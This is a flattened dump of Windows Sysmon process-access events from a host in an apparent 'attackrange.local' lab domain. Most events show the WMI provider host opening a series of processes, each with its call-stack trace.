16:54:03.560{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-BFAA-00000000AD01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 